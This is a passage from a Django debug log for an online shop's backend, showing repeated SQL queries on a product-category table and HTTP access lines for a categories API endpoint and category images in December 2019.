"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:27:24] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:27:24,767 utils 31585 139762228295424 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:27:24,774 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:27:24,778 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:27:24,782 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:27:24,787 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:27:24,790 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:27:24,793 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:27:24,795 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:27:24,798 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:27:24,802 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:27:24,804 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:27:24,807 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:27:24,809 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:27:24,812 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:27:24,815 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:27:24,818 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:27:24,820 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:27:24,824 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:27:24,828 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:27:24,834 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:27:24,838 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:27:24,841 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:27:24,844 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:27:24,848 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:27:24,851 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:27:24,856 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:27:24,860 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:27:24,863 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:27:24,866 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:27:24,870 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:27:24,875 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:27:24,878 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:27:24,881 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:27:24,885 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:27:24,889 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:27:24,894 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:27:24,898 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:27:24,901 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:27:24,904 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:27:24,908 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:27:24,911 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:27:24,915 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:27:24,919 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:27:24,922 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:27:24,926 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:27:24,930 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:27:24] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:27:25] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [27/Dec/2019 07:27:25] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:27:33,398 utils 31585 139762228295424 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:27:33,409 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:27:33,414 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:27:33,417 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:27:33,420 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:27:33,422 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:27:33,424 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:27:33,427 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:27:33,429 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:27:33,433 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:27:33,435 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:27:33,437 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:27:33,439 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:27:33,441 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:27:33,445 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:27:33,447 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:27:33,449 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:27:33,452 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:27:33,454 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:27:33,457 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:27:33,460 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 